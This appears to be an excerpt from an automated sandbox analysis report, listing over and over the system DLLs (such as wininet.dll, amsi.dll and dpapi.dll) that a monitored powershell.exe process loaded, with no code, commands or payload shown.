Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
